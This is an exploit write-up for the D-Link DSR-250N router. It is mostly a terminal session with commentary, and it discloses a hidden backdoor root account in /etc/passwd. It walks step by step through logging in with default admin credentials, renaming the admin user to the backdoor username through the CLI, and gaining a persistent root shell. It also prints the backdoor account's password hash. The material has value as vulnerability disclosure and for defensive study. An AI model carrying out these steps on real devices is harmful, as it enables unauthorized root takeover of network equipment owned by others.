D-Link DSR-250N Persistent Root Access # # Router: D-Link DSR-250N # Hardware Version: A1 # Firmware Version: 1.05B73_WW # # Arch: armv6l, Linux # # Author: 0_o -- null_null # nu11.nu11 [at] yahoo.com # Date: 2012-11-25 # # Purpose: Persistently become real root on your D-Link DSR-250N # I just wanted to do real firewalling on this # cigarette box, but the router software wouldn't # let me. So it screamed after getting h@kCz0r3d. # # Prerequisites: admin access to CLI # # # Here comes the fun stuff... :-) # # From the default configuration, you can log in via SSH. # user: admin, pass: admin # root@bt:~# ssh admin@192.168.10.1 The authenticity of host '192.168.10.1 (192.168.10.1)' can't be established. RSA key fingerprint is aa:66:55:ee:cc:66:ff:aa:dd:44:55:00:44:99:33:77. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.10.1' (RSA) to the list of known hosts. admin@192.168.10.1's password: BusyBox v1.17.4 (2011-01-29 12:32:21 IST) built-in shell (ash) Enter 'help' for a list of built-in commands. ************************************************ Welcome to DSR-250N Command Line Interface ************************************************ D-Link DSR> .exit Exit this session .help Display an overview of the CLI syntax .history Display the current session's command line history .reboot Reboot the system. .top Return to the default mode dot11 [Wireless configuration Mode] license [License configuration Mode] net [Networking configuration mode] qos [QoS configuration Mode] security [Security configuration mode] show Display system components' configuration system [System configuration mode] util [Utilities Mode] vpn [VPN configuration Mode] D-Link DSR> # # So you get dropped into the CLI. No shellz :( # Let's see what we can do from here... # D-Link DSR> util cat /etc/passwd root:!:0:0:root:/root:/bin/sh ZX4q9Q9JUpwTZuo7:$1$CtRn6tvb$c3GrPDua6tg9pXFWu.9rF1:0:0:root:/:/bin/sh nobody:x:0:0:nobody:/nonexistent:/bin/false admin:x:0:2:Linux User,,,:/home/admin:/bin/sh guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh # # Ohhh, a backdoor user! Shame on you, D-Link!!! # First, I tried to crack the hash. After 24hrs, # I dropped that and searched for another way. # Turns out that there are more nice functions # available in that CLI... ;-) # D-Link DSR> system users edit 1 users-config[userdb]> username ZX4q9Q9JUpwTZuo7 users-config[userdb]> password newpass users-config[userdb]> password_confirm newpass users-config[userdb]> save # # Now, you will have overwritten the first user # managed by the D-Link router software. This # user is your current admin user. We have given him # the username of the backdoor user and set a new # password. You might want to add another admin # user first and modify that. # For this PoC, I just use default one. Let's see # what /etc/passwd and /etc/shadow look like now... # users-config[userdb]> util cat /etc/passwd root:!:0:0:root:/root:/bin/sh ZX4q9Q9JUpwTZuo7:wq8NLLJdoSzSw:0:0:root:/:/bin/sh nobody:x:0:0:nobody:/nonexistent:/bin/false guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh users-config[userdb]> util cat /etc/shadow guest:TN08ndVLhlVok:14975:0:99999:7::: # # So, the MD5-Crypt hash has been replaced by a # DES-Crypt (unix crypt) hash... # users-config[userdb]> exit D-Link DSR> .exit Connection to 192.168.10.1 closed by remote host. Connection to 192.168.10.1 closed. # # Let's have a taste of the new freedom... # root@bt:~# ssh ZX4q9Q9JUpwTZuo7@192.168.10.1 ZX4q9Q9JUpwTZuo7@192.168.10.1's password: BusyBox v1.17.4 (2011-01-29 12:32:21 IST) built-in shell (ash) Enter 'help' for a list of built-in commands. DSR-250N> id uid=0(root) gid=0(root) groups=0(root) DSR-250N> uname -a Linux DSR-250N 2.6.31.1-cavm1 #5 Fri Sep 28 11:41:26 IST 2012 armv6l GNU/Linux DSR-250N> ls -la / drwxr-xr-x 18 root root 0 Jan 1 00:00 . drwxr-xr-x 18 root root 0 Jan 1 00:00 .. drwxr-xr-x 2 root root 0 Jan 1 00:02 bin lrwxrwxrwx 1 root root 5 Jan 1 1970 data -> flash drwxr-xr-x 5 root root 0 Jan 1 00:02 dev drwxr-xr-x 12 root root 0 Jan 1 00:08 etc drwxr-xr-x 4 root root 0 Jan 1 1970 flash drwxr-xr-x 2 root root 0 Jan 1 1970 flash_multiboot drwxr-xr-x 4 root root 0 Jan 1 00:01 home lrwxrwxrwx 1 root root 10 Sep 28 2012 init -> /sbin/init drwxr-xr-x 2 root root 0 Jan 1 00:00 lib lrwxrwxrwx 1 root root 12 Sep 28 2012 linuxrc -> /bin/busybox drwxr-xr-x 3 root root 0 Jan 1 1970 mnt drwxr-xr-x 9 root root 146 Sep 28 2012 pfrm2.0 dr-xr-xr-x 71 root root 0 Jan 1 1970 proc drwxr-xr-x 2 root root 0 Sep 28 2012 root drwxr-xr-x 2 root root 0 Jan 1 00:01 sbin drwxr-xr-x 11 root root 0 Jan 1 1970 sys -rw-r--r-- 1 root root 5 Jan 1 00:00 temp drwxrwxrwt 4 root root 380 Jan 1 00:09 tmp drwxr-xr-x 6 root root 0 Jan 1 1970 usr drwxrwxrwt 18 root root 1200 Jan 1 00:03 var DSR-250N> df -h Filesystem Size Used Available Use% Mounted on tmpfs 61.2M 956.0K 60.3M 2% /tmp tmpfs 61.2M 932.0K 60.3M 1% /var tmpfs 61.2M 0 61.2M 0% /mnt/tmpfs /dev/mtdblock3 19.5M 19.5M 0 100% /pfrm2.0 /dev/mtdblock4 2.1M 504.0K 1.6M 23% /flash DSR-250N> echo "r00ted! :-)" r00ted! :-) DSR-250N> exit Connection to 192.168.10.1 closed. root@bt:~# # # Your web gui will not work until you reboot your box. Then, log # in with the backdoor user and you will have the full admin gui back. # # By the way, how did they confine us to the CLI in the first place? # DSR-250N> cat /etc/profile # /etc/profile LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib PATH=.:/pfrm2.0/bin:$PATH CLISH_PATH=/etc/clish export PATH LD_LIBRARY_PATH CLISH_PATH # redirect all users except root to CLI if [ "$USER" != "ZX4q9Q9JUpwTZuo7" ] ; then trap "/bin/login" SIGINT trap "" SIGTSTP /pfrm2.0/bin/cli exit fi PS1='DSR-250N> ' DSR-250N>